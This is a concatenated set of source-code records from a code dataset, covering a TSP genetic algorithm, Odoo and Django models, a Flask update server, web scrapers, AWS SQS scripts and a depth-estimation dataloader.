best_chromosome]\n condition = False\n\n else :\n if calculateDistance (map , best_chromosome) < calculateDistance (map , previous) :\n previous = [i for i in best_chromosome]\n\n # At this point the best chromosome has to remove from population.\n # Otherwise it will do crossing over with itself.\n\n population.remove (best_chromosome)\n population = crossingOver (population , best_chromosome , cities)\n\n # Finally the best chromosome has to append to the population.\n # Otherwise the population will evanesce approximately at 6 generation.\n # (The iteration of evanesce is changeable according as your number of city)\n\n population.append (best_chromosome)\n\n # The previous variable is contain the shortest path (in other words the best chromosome).\n\n return previous\n\ndef createMap () :\n map = dict ()\n\n # At this point we have to create a map to apply our genetic algorithm.\n # There is 7 city and their ways from each one to other one.\n # You may set up distance according to your problem.\n\n map ['A'] = {'B' : 3 , 'C' : 7 , 'D' : 12 , 'E' : 9 , 'F' : 4 , 'G' : 15}\n map ['B'] = {'A' : 3 , 'C' : 2 , 'D' : 6 , 'E' : 5 , 'F' : 8 , 'G' : 13}\n map ['C'] = {'A' : 7 , 'B' : 2 , 'D' : 4 , 'E' : 3 , 'F' : 1 , 'G' : 5}\n map ['D'] = {'A' : 12 , 'B' : 6 , 'C' : 4 , 'E' : 11 , 'F' : 9 , 'G' : 5}\n map ['E'] = {'A' : 9 , 'B' : 5 , 'C' : 3 , 'D' : 11 , 'F' : 4 , 'G' : 1}\n map ['F'] = {'A' : 4 , 'B' : 8 , 'C' : 1 , 'D' : 9 , 'E' : 4 , 'G' : 7}\n map ['G'] = {'A' : 15 , 'B' : 13 , 'C' : 5 , 'D' : 5 , 'E' : 1 , 'F' : 7}\n\n return map\n\ndef startingPopulation (map , list_of_cities) :\n population = list ()\n\n # For 7 cities there is 7! possible population at the beginning.\n # This means you can select your number of population between 1 and 5,040.\n\n number_of_population = randint (5 , 10)\n\n for count in range (number_of_population) :\n chromosome = list ()\n\n while len (chromosome) < 7 :\n\n # \"randint\" method generate a random number\n # between starting parameter (inclusive) and ending parameter (inclusive).\n # So the range has to decrease once.\n\n random_index = randint (0 , (len (list_of_cities) - 1))\n\n if list_of_cities [random_index] not in chromosome :\n chromosome.append (list_of_cities [random_index])\n\n population.append (chromosome)\n\n return population\n\ndef findPurposeValue (map , population) :\n results = dict ()\n\n for chromosome in population :\n results [calculateDistance (map , chromosome)] = chromosome\n\n value = min (results)\n\n return results [value]\n\ndef calculateDistance (map , chromosome) :\n distance = 0\n\n for city in range (len (chromosome) - 1) :\n neighbors = map [chromosome [city]]\n distance += neighbors [chromosome [city + 1]]\n\n return distance\n\ndef crossingOver (population , best_chromosome , cities) :\n\n # \"split pieces\" variable is determine the number of gene swap for crossing over\n\n split_pieces = randint (1 , (len (population [0]) // 2))\n\n i = 0\n\n while i < len (population) :\n j = -1\n\n while j >= (-1 * split_pieces) :\n population [i][j] = best_chromosome [j]\n j -= 1\n\n population [i] = checkDuplicates (population [i] , cities)\n\n # After the crossing over, there may be a mutation.\n # This means the realize condition have to be randomly to mutation.\n # And the solution is the \"randint\" method again.\n\n if randint (1 , 15) % 3 == 0 :\n population [i] = mutation (population [i])\n\n i += 1\n\n return population\n\ndef checkDuplicates (chromosome , cities) :\n for city in cities :\n if city not in chromosome :\n i = 0\n while i < len (chromosome) :\n j = i + 1\n while j < len (chromosome) :\n if chromosome [i] == chromosome [j] :\n chromosome [i] = city\n\n j += 1\n i += 1\n\n return chromosome\n\ndef mutation (chromosome) :\n\n # The mutation operation needs to two genes for swapping genes with each other.\n\n first = 0 # first gene index\n second = 0 # second gene index\n\n while first == second :\n\n # These genes are chosen randomly\n\n first = randint (1 , len (chromosome) - 1)\n second = randint (1 , len (chromosome) - 1)\n\n # Genes are moved simultaneously,\n\n chromosome [first] , chromosome [second] = chromosome [second] , chromosome [first]\n\n # and returned where called function is.\n\n return chromosome\n\nif __name__ == \"__main__\" :\n main ()","sub_path":"Source.py","file_name":"Source.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"589269071","text":"# Copyright 2018 Onestein ()\n# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).\n\nfrom odoo import api, fields, models\n\n\nclass ResPartner(models.Model):\n _inherit = 'res.partner'\n\n transus_gln = fields.Char(string='GLN')\n\n _sql_constraints = [\n ('name_uniq', 'unique(transus_gln, company_id)', 'Partner GLN must be unique per company!'),\n ]\n\n @api.multi\n def check_gln(self):\n is_correct = True\n for partner in self:\n if partner.transus_gln and len(partner.transus_gln) != 13:\n is_correct = False\n return is_correct\n\n _constraints = [\n (check_gln, \"The entered GLN is not correct.\", [\"transus_gln\"])\n ]\n","sub_path":"transus/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"121842872","text":"import datetime\n\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.utils import timezone\nfrom django.db.models import Sum\nfrom .models import ReadCounter, VisitorCounter\n\n\ndef add_read_cnt_once(request, model_obj):\n ct = ContentType.objects.get_for_model(model_obj)\n key = \"{}_pk_{}\".format(str(ct.model), str(model_obj.pk))\n\n if not request.COOKIES.get(key):\n # if ReadCounter.objects.filter(content_type=ct, object_id=model_obj.pk).count():\n # readcounter = ReadCounter.objects.get(content_type=ct, object_id=model_obj.pk)\n # else:\n # # 不存在记录\n # readcounter = ReadCounter(content_type=ct, object_id=model_obj.pk)\n # # 阅读计数器加1\n # readcounter.read_cnt += 1\n readcounter, created = ReadCounter.objects.get_or_create(content_type=ct, object_id=model_obj.pk)\n readcounter.read_cnt += 1\n readcounter.save()\n\n # 访客数加1\n date = timezone.now().date()\n visitorcounter, created = VisitorCounter.objects.get_or_create(content_type=ct, object_id=model_obj.pk, date=date)\n visitorcounter.visitor_cnt += 1\n visitorcounter.save()\n\n return key\n\ndef get_latest_week_visit(content_type):\n today = timezone.now().date()\n visitor_cnt_list = []\n dates_list = []\n\n for i in range(7, 0, -1):\n date = today - datetime.timedelta(days=i)\n dates_list.append(date.strftime('%m-%d'))\n visitorcounter = VisitorCounter.objects.filter(content_type=content_type, date=date)\n result = visitorcounter.aggregate(visitor_sum=Sum('visitor_cnt'))\n visitor_cnt_list.append(result['visitor_sum'] or 0)\n return dates_list, visitor_cnt_list\n\ndef get_today_hot_blogs(content_type):\n today = timezone.now().date()\n visitor_cnt = VisitorCounter.objects.filter(content_type=content_type,\\\n date=today).order_by('-visitor_cnt')\n return visitor_cnt[:7]\n\ndef get_yesterday_hot_blogs(content_type):\n today = timezone.now().date()\n yesterday = today - datetime.timedelta(days=1)\n visitor_cnt = VisitorCounter.objects.filter(content_type=content_type,\\\n date=today).order_by('-visitor_cnt')\n return visitor_cnt[:7]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"reader/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"122845835","text":"#!/usr/bin/env python3\r\n\"\"\"\r\nThis is the server for the server-client-update-application.\r\nIf a client connects to this server, it checks for an update of the required software and if found, streams it to the client.\r\n\"\"\"\r\n\r\nfrom __future__ import print_function\r\nfrom flask import Flask, request, session\r\nfrom datetime import datetime\r\nimport platform\r\nimport json\r\n\r\n\r\napp = Flask(__name__)\r\n# set the secret key. keep this really secret:\r\napp.secret_key = 'A0Zr98j/3yX R~XHH!jmN]LWX/,?RT'\r\n\r\n\r\n@app.route('/start_connection', methods = ['POST'])\r\ndef start_connection():\r\n\t\"\"\"\r\n\tStarts the connection of server and client.\r\n\tIn order to do so, stores everything in the session object. Starts the checking for update afterwards.\r\n\t\"\"\"\r\n\t# setup data\r\n\tsession['name'] = request.form['name']\r\n\tsession['date'] = request.form['date']\r\n\tsession['ip'] = request.remote_addr\r\n\tsession['processor'] = request.form['processor']\r\n\tsession['ram'] = request.form['ram']\r\n\tsession['platform'] = request.form['platform']\r\n\tsession['program'] = request.form['program']\r\n\tsession['version'] = request.form['version']\r\n\treturn (check_for_update())\r\n\r\n\r\ndef check_for_update():\r\n\t\"\"\"\r\n\tCompares the current version of the program with the one stored on the server.\r\n\tLoads the data of the updates stored on the server as json string and compares it. If update is available, starts downloading it.\r\n\t\"\"\"\r\n\twith open('packages.json') as json_string:\r\n\t\tjson_obj = json.load(json_string);\r\n\r\n\tif session['program'] not in json_obj:\r\n\t\treturn 'no update available for this software.'\r\n\r\n\tif session['version'] == json_obj[session['program']]['version']:\r\n\t\treturn 'software is up to date.'\r\n\telse :\r\n\t\treturn (get_update())\r\n\r\n# searches for the update package\r\ndef get_update():\r\n\t\"\"\"\r\n\tSearches for update package.\r\n\tIf found, stream it as binary to the client.\r\n\t\"\"\"\r\n\twith open('packages/' + session['program'] + '/' + session['program'] + '.zip', 'rb') as f:\r\n\t\tmy_file = f.read()\r\n\treturn my_file","sub_path":"py/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"5289534","text":"from bs4 import BeautifulSoup as bs\nimport requests\nimport re\nimport pandas as pd\nimport numpy as np\n\nr = requests.get(\"https://kuckjwi0928.github.io/pythoncodingprogram/\").text\nsoup = bs(r, 'html.parser')\ntexts = soup.find_all('td')\n\nDF = pd.DataFrame(columns=['Name', 'Phone', 'Value'])\nfor P in range(0, 4):\n if (P % 2 == 0):\n DF.loc[(P//2), ['Name']] = re.split('/', texts[P].text)[0]\n DF.loc[(P//2), ['Phone']] = re.split('/', texts[P].text)[1]\n else:\n pattern = re.compile('[A-Z가-힣]')\n DF.loc[(P//2), ['Value']] = ', '.join(pattern.findall(texts[P].text))\n\nprint(DF)\n","sub_path":"Group members/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"255480498","text":"#import boto3\nimport random\nimport multiprocessing\nimport time\n\n\n\n\ndef sleeper (n, name):\n print('Hi, I am Process {}. Sleeping for 3 seconds.'.format(name))\n time.sleep(3)\n print('{} is now awake'.format(name))\n\n\ndef inserter(name):\n sqs = boto3.client('sqs')\n #response = sqs.list_queues()\n #print(response['QueueUrls'])\n\n # Fifo queues have different requirements for keys inside sqs.send_message than Standard Q's.\n queue_url = 'https://queue.amazonaws.com/308303745136/SL-test-FQ.fifo'\n\n # Send message to SQS queue\n count = 0\n while count < 3:\n count_str = str(count)\n response = sqs.send_message(\n MessageGroupId=count_str,\n MessageDeduplicationId='{0}{1}{2}'.format(name, count, random.randint(1,1000000)),\n QueueUrl=queue_url,\n MessageBody=(\n 'Information'\n )\n )\n\n count += 1\n #if response['ResponseMetadata']['HTTPStatusCode'] != 200:\n print(name, response)\n\n\nif __name__ == '__main__':\n jobs = []\n for i in range(5):\n p = multiprocessing.Process(target=sleeper, args=(i, i))\n jobs.append(p)\n p.start()\n","sub_path":"Python/sqs.fifo.multiprocess.inserter.py","file_name":"sqs.fifo.multiprocess.inserter.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"17269226","text":"from grab import Grab\nfrom grab.spider import Spider, Task\nfrom urllib.parse import urljoin\nimport re\n\n\nclass OoqiaSpider(Spider):\n def prepare(self):\n self.initial_urls = ['https://attorneys.superlawyers.com/divorce/new-york-metro/new-york/']\n self.attorneys = []\n self.current_page = 1\n self.current_att = 1\n super(OoqiaSpider, self).prepare()\n\n def task_initial(self, grab, task):\n print('Current page: %s' % self.current_page)\n container = grab.doc.select('//*[@id=\"browse_view\"]')\n selector = './/*[contains(@class,\"search_result\")]'\n for attorney in container.select(selector):\n # att = dict()\n # img_tag = attorney.select('.//*[@class=\"image\"]//img')\n # if img_tag:\n # att['picture'] = img_tag.attr('src')\n card = attorney.select('.//*[@class=\"text_container\"]')\n # att['name'] = card.select('.//h2').text()\n url = card.select('.//*[@class=\"indigo_text\"]//a').attr('href') \n #import pdb; pdb.set_trace()\n yield Task('attorney_detail', self.get_attorney_url(url)) \n # self.attorneys.append(att)\n\n pagination = grab.doc.select('//*[@class=\"pagination\"]')\n next_page = pagination.select('.//a[@rel=\"next\"]')\n if next_page:\n url = next_page.attr('href')\n self.current_page += 1\n yield Task('initial', grab.make_url_absolute(url))\n\n def task_attorney_detail(self, grab, task): \n att = dict()\n name = grab.doc.select('//*[@id=\"lawyer_bio_block\"]//*[@id=\"lawyer_name\"]').text()\n practice_areas = grab.doc.select('//*[@id=\"lawyer_bio_block\"]//*[@id=\"practice_areas\"]').text()\n img_tag = attorney.select('.//*[@class=\"image\"]//img')\n if (name is not None and practice_areas is not None):\n self.current_att += 1\n print(' (%s) Current Attorney: %s' % (self.current_att, name))\n print(' (%s) Practice Areas: %s' % (self.current_att, practice_areas))\n\n def get_attorney_url(self, url):\n g = Grab()\n g.setup(follow_location=True, connect_timeout=10) \n g.go(url)\n if g.doc.code == 200: \n return g.doc.url\n\n def make_url_absolute(grab, href, force_https=False):\n if grab.config['url']:\n base_url = grab.doc.url\n url = urljoin(base_url, href)\n else:\n url = href\n if force_https and url.startswith('http://'):\n url = re.sub('^http:\\/\\/', 'https://', url)\n return url\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"565101342","text":"import os\nimport os.path\nimport numpy as np\nimport torch.utils.data as data\nfrom dataloaders.associate import read_file_list, associate\nfrom path import Path\nimport dataloaders.custom_transforms as custom_transforms\nimport cv2\n\n_EPS = np.finfo(float).eps * 4.0\n\n\ndef transform34(l):\n \"\"\"\n Generate a 3x4 homogeneous transformation matrix from a 3D point and unit quaternion.\n\n Input:\n l -- tuple consisting of (stamp,tx,ty,tz,qx,qy,qz,qw) where\n (tx,ty,tz) is the 3D position and (qx,qy,qz,qw) is the unit quaternion.\n\n Output:\n matrix -- 4x4 homogeneous transformation matrix\n \"\"\"\n t = l[:3]\n q = np.array(l[3:7], dtype=np.float64, copy=True)\n nq = np.dot(q, q)\n if nq < _EPS:\n return np.array((\n (1.0, 0.0, 0.0, t[0]),\n (0.0, 1.0, 0.0, t[1]),\n (0.0, 0.0, 1.0, t[2]),\n (0.0, 0.0, 0.0, 1.0)\n ), dtype=np.float64)\n q *= np.sqrt(2.0 / nq)\n q = np.outer(q, q)\n return np.array((\n (1.0 - q[1, 1] - q[2, 2], q[0, 1] - q[2, 3], q[0, 2] + q[1, 3], t[0]),\n (q[0, 1] + q[2, 3], 1.0 - q[0, 0] - q[2, 2], q[1, 2] - q[0, 3], t[1]),\n (q[0, 2] - q[1, 3], q[1, 2] + q[0, 3], 1.0 - q[0, 0] - q[1, 1], t[2])\n ), dtype=np.float64)\n\ndef read_calib_file(path):\n # taken from https://github.com/hunse/kitti\n float_chars = set(\"0123456789.e+- \")\n data = {}\n with open(path, 'r') as f:\n for line in f.readlines():\n key, value = line.split(':', 1)\n value = value.strip()\n data[key] = value\n if float_chars.issuperset(value):\n # try to cast to float array\n try:\n data[key] = np.array(list(map(float, value.split(' '))))\n except ValueError:\n # casting error: data[key] already eq. value, so pass\n pass\n\n return data\n\n\ndef make_dataset(dir, sequence_length=1, used_only_left_images=False, used_sequences=None):\n sequences = []\n dir = os.path.expanduser(dir)\n for target in sorted(os.listdir(dir)):\n d = os.path.join(dir, target)\n split = str(d).split('/')\n if not os.path.isdir(d) or (used_sequences is not None and not split[-1] in used_sequences):\n continue\n\n root = Path(d)\n\n rgb_list = read_file_list(root / \"rgb.txt\")\n depth_list = read_file_list(root / \"depth.txt\")\n pose_list = read_file_list(root / \"groundtruth.txt\")\n\n rgbd_matches = dict(associate(rgb_list, depth_list, offset=list(rgb_list)[0] - list(depth_list)[0]))\n rgbdt_matches = associate(rgbd_matches, pose_list, offset=list(rgb_list)[0] - list(pose_list)[0])\n\n rgb_files = [root / rgb_list[a][0] for a, b in rgbdt_matches]\n depth_files = [root / depth_list[rgbd_matches[a]][0] for a, b in rgbdt_matches]\n poses = [transform34(pose_list[b]) for a,b in rgbdt_matches]\n poses = np.array(poses)\n\n assert len(rgb_files) == len(depth_files) == len(poses)\n\n intrinsics = np.loadtxt(root / \"intrinsics.txt\").reshape(3, 3)\n\n for i in range(len(rgb_files) - sequence_length + 1):\n sequence = {'reset': i == 0, 'rgb_images': [], 'depth_images': [], 'intrinsics': intrinsics, 'poses': None}\n\n if sequence_length == 1:\n sequence['poses'] = poses[i].reshape(1, 3, 4)\n else:\n first_pose = poses[i]\n current_poses = np.copy(poses[i:i + sequence_length])\n current_poses[:, :, -1] -= first_pose[:, -1]\n current_poses = np.linalg.inv(first_pose[:, :3]) @ current_poses\n sequence['poses'] = current_poses\n\n for j in range(sequence_length):\n sequence['rgb_images'].append(rgb_files[i + j])\n sequence['depth_images'].append(depth_files[i + j])\n sequences.append(sequence)\n\n return sequences\n\n\nclass TUMLoader(data.Dataset):\n def __init__(self, root, type, sequence_length=1, output_size=(320, 384), use_only_left_images=False, sequences=None):\n self.samples = make_dataset(Path(root) / type, sequence_length, use_only_left_images, used_sequences=sequences)\n assert len(self.samples) > 0, \"Found 0 images in subfolders of: \" + root + \"\\n\"\n self.root = root\n self.type = type\n self.output_size = output_size\n self.sequence_length = sequence_length\n\n def train_transform(self, rgb_images, depth_images, intrinsics, poses):\n jitter = custom_transforms.ColorJitter.get_params(0.4, 0.4, 0.4, 0.0)\n train_transform = custom_transforms.Compose([\n custom_transforms.RandomRotate(5.0),\n custom_transforms.CenterCrop(self.output_size),\n custom_transforms.RandomHorizontalFlip(),\n custom_transforms.RandomReverseOrder(),\n jitter,\n custom_transforms.ArrayToTensor()\n ])\n\n return train_transform(rgb_images, depth_images, intrinsics, poses)\n\n\n def val_transform(self, rgb_images, depth_images, intrinsics, poses):\n valid_transform = custom_transforms.Compose([\n custom_transforms.CenterCrop(self.output_size),\n custom_transforms.ArrayToTensor()\n ])\n\n return valid_transform(rgb_images, depth_images, intrinsics, poses)\n\n def __getitem__(self, index):\n sample = self.samples[index]\n\n rgb_files = sample[\"rgb_images\"]\n depth_files = sample[\"depth_images\"]\n\n rgb_images = [cv2.imread(f) for f in rgb_files]\n depth_images = [cv2.imread(f, cv2.IMREAD_UNCHANGED).astype(np.float32) / 5000.0 for f in depth_files]\n intrinsics = np.copy(sample[\"intrinsics\"]).astype(np.float32)\n poses = np.copy(sample[\"poses\"]).astype(np.float32)\n\n if self.type == \"train\":\n image_tensors, depth_tensors, intrinsics, transformed_poses = self.train_transform(rgb_images, depth_images,\n intrinsics,\n poses)\n elif self.type == \"val\":\n image_tensors, depth_tensors, intrinsics, transformed_poses = self.val_transform(rgb_images, depth_images,\n intrinsics,\n poses)\n else:\n raise Exception(\"Invalid dataloader type! (Needs to be either 'train' or 'val'.\")\n\n if poses is None:\n poses = np.zeros((self.sequence_length, 3, 4), dtype=np.float32)\n if transformed_poses is None:\n transformed_poses = np.zeros((self.sequence_length, 3, 4), dtype=np.float32)\n\n return sample[\"reset\"], image_tensors, depth_tensors, intrinsics, np.linalg.inv(intrinsics), poses, transformed_poses\n\n def __len__(self):\n return len(self.samples)\n","sub_path":"dataloaders/tum_rgbd_loader.py","file_name":"tum_rgbd_loader.py","file_ext":"py","file_size_in_byte":7023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"297547541","text":"from django.contrib import admin\nfrom django.urls import path\nfrom .views import *\n\nurlpatterns = [\n \n path('', home, name=\"home\"),\n path('honor/',honor, name=\"honor\"),\n path('honorRegister1/',honorRegister1, name=\"honorRegister1\"),\n path('honorRegister2/',honorRegister2, name=\"honorRegister2\"),\n path('honorRegistered//',honorRegistered, name=\"honorRegistered\"),\n path('free/', free, name=\"free\"),\n path('freeRegister1/',freeRegister1, name=\"freeRegister1\"),\n path('freeRegister2/',freeRegister2, name=\"freeRegister2\"),\n path('freeRegistered/',freeRegistered, name=\"freeRegistered\"),\n path('aboutUs/',aboutUs, name=\"aboutUs\"),\n path('searchMap/',searchMap,name=\"searchMap\"),\n path('searchResult/',searchResult, name='searchResult'),\n \n path('mypage/',mypage,name=\"mypage\"),\n \n path('mypageDiary/',mypageDiary,name=\"mypageDiary\"),\n path('mypageDiaryCreate/',mypageDiaryCreate,name=\"mypageDiaryCreate\"),\n \n path('mypagePhoto/',mypagePhoto,name=\"mypagePhoto\"),\n path('mypagePhotoCreate/',mypagePhotoCreate,name=\"mypagePhotoCreate\"),\n \n path('mypageVisitorBook/',mypageVisitorBook,name=\"mypageVisitorBook\"),\n path('mypageVisitorBookCreate/',mypageVisitorBookCreate,name=\"mypageVisitorBookCreate\"),\n \n \n path('mypageOption/',mypageOption,name=\"mypageOption\"),\n path('mypageUpdate/',mypageUpdate,name=\"mypageUpdate\"),\n \n \n path('enroll/',enroll, name=\"enroll\"),\n path('enroll2/',enroll2, name=\"enroll2\"),\n path('enrolled/',enrolled, name=\"enrolled\"),\n path('caaard/', caaard, name=\"caaard\"),\n path('csCenter/', csCenter, name=\"csCenter\"),\n path('q_and_a/', q_and_a, name=\"q_and_a\"),\n path('idFind/', idFind, name=\"idFind\"),\n path('pwFind/', pwFind, name=\"pwFind\"),\n path('normal/',normal, name=\"normal\"),\n path('animal_delete/',delete,name=\"delete\"),\n]","sub_path":"dbgproject/dbg/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"119055847","text":"from sys import stdin, setrecursionlimit\nfrom collections import defaultdict\nfrom heapq import heapify, heappush, heappushpop\n\n\ndef main():\n input = stdin.buffer.readline\n n, m = map(int, input().split())\n ab = [list(map(int, input().split())) for _ in range(n)]\n\n dic = defaultdict(list)\n for a, b in ab:\n dic[a].append(b)\n\n q = []\n heapify(q)\n\n for i in sorted(dic.keys(), reverse=True):\n for j in sorted(dic[i], reverse=True):\n if len(q) <= m - i:\n heappush(q, j)\n elif q and q[0] < j:\n heappushpop(q, j)\n\n print(sum(q))\n\n\nif __name__ == \"__main__\":\n setrecursionlimit(10000)\n main()\n","sub_path":"Python_codes/p02948/s990116518.py","file_name":"s990116518.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"544177016","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 13 21:54:55 2016\n\n@author: Kapythone\n\"\"\"\n\ndef wordBreak(s, wordDict):\n hashmap = {}\n for w in wordDict:\n hashmap[w] = 1\n \n return f(s, hashmap)\n \ndef f(s, hashmap):\n if s == '':\n return True\n\n pres = []\n for i in range(1, len(s) + 1):\n pres.append(s[:i])\n \n for p in pres:\n if p in hashmap:\n if f(s[len(p):], hashmap) == True:\n return True\n \n return False","sub_path":"Word Break.py","file_name":"Word Break.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"168161900","text":"from typing import Dict\n\nimport MySentrySettings\nimport requests\nimport traceback\n\n\nclass ErrorLogSender:\n\n def __init__(self, app_id: int, app_token: str):\n assert isinstance(app_id, int), f'id not int'\n assert isinstance(app_token, str) and len(app_token) != 0, f'token is empty or not string'\n self.id = app_id\n self.token = app_token\n\n def sender(self, error_log: Dict) -> None:\n assert len(error_log) == 3 and ['error_type', 'error_message', 'error_stack_trace'] == list(error_log.keys()), \\\n f'error_log is invalid'\n url = f'http://127.0.0.1:8000/apps/{self.id}/error_log/'\n requests.post(url, data=error_log, headers={'token': self.token})\n\n\ndef error_searcher(fun):\n def wrapper():\n app = ErrorLogSender(MySentrySettings.settings['id'], MySentrySettings.settings['token'])\n try:\n return fun()\n except Exception as error:\n error_dict_for_sender = {\n 'error_type': error.__class__.__name__,\n 'error_message': error.__str__(),\n 'error_stack_trace': ''.join(traceback.format_stack())\n }\n app.sender(error_dict_for_sender)\n\n return wrapper\n\n","sub_path":"sdk_for_MySentry/sdk_for_mysentry_pgk/sdk.py","file_name":"sdk.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"550264025","text":"# -*- coding: utf-8 -*-\nimport time\nfrom website.core import ObjectType\n\nclass Client(object):\n CLIENT_ANDROID = 1\n CLIENT_IOS = 2\n CLIENT_WX = 3\n\n @classmethod\n def gen_id(cls, db):\n obj_type = ObjectType.CLIENT\n result = db.execute(\"INSERT INTO _object (`type`) VALUES (%s)\", obj_type)\n return result.lastrowid\n\n\n @classmethod\n def create_client(cls, db, client_id, appid, developer_id, platform_type, platform_identity):\n now = int(time.time())\n sql = \"INSERT INTO client(id, app_id, developer_id, platform_type, platform_identity, ctime, utime) VALUES(%s, %s, %s, %s, %s, %s, %s)\"\n r = db.execute(sql, (client_id, appid, developer_id, platform_type, platform_identity, now, now))\n return r.lastrowid\n\n @classmethod\n def create_wx(cls, db, client_id, gh_id, wx_appid, refresh_token, store_id):\n sql = \"INSERT INTO client_wx(client_id, gh_id, wx_app_id, refresh_token, store_id, is_authorized) VALUES(%s, %s, %s, %s, %s, %s)\"\n r = db.execute(sql, (client_id, gh_id, wx_appid, refresh_token, store_id, 1))\n return r.lastrowid\n\n @classmethod\n def get_app(cls, db, gh_id):\n sql = \"SELECT app.id as id, app.name as name, app.developer_id as developer_id FROM client_wx, client, app WHERE gh_id=%s and client_wx.client_id=client.id and client.app_id=app.id\"\n r = db.execute(sql, gh_id)\n obj = r.fetchone()\n return obj\n\n @classmethod\n def get_wx_app(cls, db, appid):\n sql = \"SELECT app.id as id, app.name as name FROM app, client, client_wx WHERE app.id=%s AND client.app_id=app.id AND client.id=client_wx.client_id\"\n r = db.execute(sql, appid)\n return r.fetchone()\n\n @classmethod\n def get_wx(cls, db, wx_appid):\n sql = \"SELECT client_id, gh_id, wx_app_id, refresh_token, store_id, is_authorized FROM client_wx WHERE wx_app_id=%s\"\n r = db.execute(sql, wx_appid)\n return r.fetchone()\n\n @classmethod\n def get_wx_count(cls, db, store_id):\n sql = \"SELECT count(client.id) as count FROM client_wx, client WHERE client_wx.client_id=client.id AND client_wx.store_id=%s\"\n r = db.execute(sql, store_id)\n obj = r.fetchone()\n return obj['count']\n\n\n\n\n @classmethod\n def get_wx_page(cls, db, store_id, offset, limit):\n sql = \"SELECT app.id as id, app.name as name, client_wx.gh_id as gh_id, client_wx.wx_app_id as wx_app_id, client_wx.store_id as store_id, client_wx.is_authorized as is_authorized FROM client_wx, client, app WHERE client_wx.client_id=client.id AND client_wx.store_id=%s AND client.app_id=app.id LIMIT %s, %s\"\n r = db.execute(sql, (store_id, offset, limit))\n return list(r.fetchall())\n\n @classmethod\n def get_store_id(cls, db, gh_id):\n sql = \"SELECT store_id FROM client_wx WHERE client_wx.gh_id=%s\"\n r = db.execute(sql, gh_id)\n obj = r.fetchone()\n if not obj:\n return 0\n return obj['store_id']\n\n\n @classmethod\n def set_wx_unauthorized(cls, db, wx_appid):\n sql = \"UPDATE client_wx SET is_authorized=%s WHERE wx_app_id=%s\"\n r = db.execute(sql, (0, wx_appid))\n return r.rowcount\n\n @classmethod\n def set_wx_authorized(cls, db, wx_appid):\n sql = \"UPDATE client_wx SET is_authorized=%s WHERE wx_app_id=%s\"\n r = db.execute(sql, (1, wx_appid))\n return r.rowcount\n\n @classmethod\n def update_wx(cls, db, wx_appid, refresh_token, is_authorized):\n sql = \"UPDATE client_wx SET refresh_token=%s, is_authorized=%s WHERE wx_app_id=%s\"\n \n is_auth = 1 if is_authorized else 0\n r = db.execute(sql, (refresh_token, is_auth, wx_appid))\n return r.rowcount\n\n","sub_path":"models/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"616165263","text":"import math\r\ndef findfactors(n):\r\n f=[]\r\n for i in range(1,int(math.sqrt(n)+1)):\r\n if n%i==0:\r\n if(n/i==i):\r\n f=f+[i]\r\n else:\r\n f=f+[i]+[int(n/i)]\r\n return f\r\nx=int(input(\"Enter number: \"))\r\nprint(\"factors of \",x,\": \",findfactors(x))\r\n","sub_path":"assignments/pythonpgms/factorsofNumber.py","file_name":"factorsofNumber.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"24444966","text":"import math\nd = 11\nstart = int((10**d)**(1.0/3))\nend = int((10**(d+1))**(1.0/3))\nseq = range(start, end)\n\nseq_cub = [a**3 for a in seq]\nseq_cub_digit = [''.join(sorted([b for b in str(a)])) for a in seq_cub]\n\nfrom collections import Counter\ncc = Counter(seq_cub_digit).most_common(10)\ndigit = cc[1][0]\n#aa=[a== cc[0][0] for a in seq_cub_digit]\nprint([a for a, b in zip(seq_cub, seq_cub_digit) if b == digit])\n","sub_path":"python/Q62.py","file_name":"Q62.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"639068393","text":"#!/usr/bin/python\r\nimport sys\r\nfrom collections import Counter\r\n\r\n\r\nclass op_stack:\r\n def __init__(self, op, items):\r\n self.op = op\r\n self.items = Counter(items)\r\n self.items[0 if op == '+' else 1] = 0\r\n\r\n def is_empty(self):\r\n return sum(self.items.values()) == 0\r\n\r\n def is_reaper(self):\r\n return (self.items[0] > 0) and (self.op == '*')\r\n\r\n def __eq__(self, other):\r\n if isinstance(other, op_stack):\r\n if self.op == 